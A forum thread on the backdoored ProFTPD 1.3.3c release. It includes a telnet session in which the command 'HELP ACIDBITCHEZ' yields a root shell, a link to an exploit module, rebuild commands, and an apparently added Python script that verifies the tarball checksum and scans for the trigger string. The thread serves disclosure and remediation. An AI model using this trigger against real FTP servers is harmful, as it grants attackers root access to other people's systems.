ProFTPD Server Compromised (28 nov/1 Dec) remote trojan exploit.

-j0 (Verified User, joined Nov 23, 2010):
Hello,

Code:
    $ telnet 0 21
    Trying 0.0.0.0...
    Connected to 0.
    Escape character is '^]'.
    220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]
    HELP
    214-The following commands are recognized (* =>'s unimplemented):
    CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
    EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
    XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
    NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
    PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU
    APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
    NLST    STAT    SITE    MLSD    MLST
    214 Direct comments to someone@somewhere
    HELP ANOOP
    502 Unknown command 'ANOOP'
    HELP a
    502 Unknown command 'A'
    HELP ACIDBITCHEZ
    id ;
    uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Code:
http://packetstormsecurity.org/files/view/96316/proftpd_133c_backdoor.rb.txt

I believe that to patch this exploit you should run the following commands:

Code:
cd /usr/local/directadmin/custombuild
./build update
./build clean
./build proftpd d

Before that, please check version.txt:

http://www.proftpd.org/md5_pgp.html
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Regards.
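The check the post asks for (comparing the downloaded tarball's MD5 against the value published at proftpd.org) can be scripted so it is not skipped during an upgrade. The following is an added example written for this thread, not code from the original post or from the ProFTPD or DirectAdmin projects. It assumes the published checksum quoted above and uses the backdoor's HELP trigger string, shown in the session above, as a second, content-based indicator: a tarball whose hash does not match is rejected, and any member containing the trigger string is reported. The sample tarballs it builds are constructed stand-ins for the real source archive.

```python
import hashlib
import io
import tarfile
import tempfile
from pathlib import Path

# Published checksum for the clean release, quoted from the thread
# (http://www.proftpd.org/md5_pgp.html).
PUBLISHED_MD5 = "4f2c554d6273b8145095837913ba9e5d"
# Trigger string of the trojaned HELP handler, as seen in the telnet session above.
BACKDOOR_MARKER = b"ACIDBITCHEZ"


def md5_of_file(path, chunk_size=1 << 20):
    """Stream the file through MD5 so large archives need not fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def tarball_matches(path, expected_md5=PUBLISHED_MD5):
    """True only when the archive's MD5 equals the published one."""
    return md5_of_file(path) == expected_md5.strip().lower()


def find_backdoor_marker(path, marker=BACKDOOR_MARKER):
    """Names of archive members whose contents contain the trigger string."""
    hits = []
    with tarfile.open(path, "r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            fh = tar.extractfile(member)
            if fh is not None and marker in fh.read():
                hits.append(member.name)
    return hits


def audit(path, expected_md5=PUBLISHED_MD5):
    """One verdict a deployment script can act on: refuse to build on either failure."""
    return {
        "md5_ok": tarball_matches(path, expected_md5),
        "marker_hits": find_backdoor_marker(path),
    }


def build_sample_tarball(directory, trojaned, name):
    """Constructed sample standing in for proftpd-1.3.3c.tar.gz (hypothetical
    contents). When trojaned is True, one member carries the trigger string."""
    path = Path(directory) / name
    help_c = b'/* help.c (constructed sample) */\nstatic const char *cmd = "HELP";\n'
    if trojaned:
        help_c += b'/* extra branch keyed on "' + BACKDOOR_MARKER + b'" */\n'
    members = (("proftpd/src/help.c", help_c), ("proftpd/README", b"ProFTPD sample\n"))
    with tarfile.open(path, "w:gz") as tar:
        for member_name, data in members:
            info = tarfile.TarInfo(member_name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return str(path)


def make_samples():
    """Build one clean and one trojaned sample archive in a fresh temp directory."""
    tmp = tempfile.mkdtemp(prefix="proftpd-audit-")
    return (build_sample_tarball(tmp, False, "clean.tar.gz"),
            build_sample_tarball(tmp, True, "trojaned.tar.gz"))


if __name__ == "__main__":
    # Usage against a real download: audit("/path/to/proftpd-1.3.3c.tar.gz")
    for sample in make_samples():
        print(sample, audit(sample))
```

Both constructed samples fail the hash check, since neither is the real archive; the point of the hash step is that a tarball fetched from the compromised mirror during the 28 Nov to 2 Dec window would fail it too, and the marker scan catches a trojaned copy even if someone forgets which checksum to compare against.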
 
I don't understand this, forgive me, but is this flaw in the actual 1.3.3c, or the hacked, modified 1.3.3c? If not the latter, have they patched it? I'm finding it hard to understand how their server was hacked in the first place.
 
@Peter: It's in the actual 1.3.3c if you downloaded the source between November 28th and December 2nd. Their server got compromised.

The custombuild version normally is from the beginning of november so when you did a custombuild upgrade, it should be ok.

I'm finding it hard to understand how their server was hacked in the first place.
Well.... I'm finding it hard to understand that there are still people around who believe that unhackable servers exist. :D
Anyway, they got in through an XSS injection via an unsafe part of the opensource panel they used and a directory which wasn't protected against executables.
 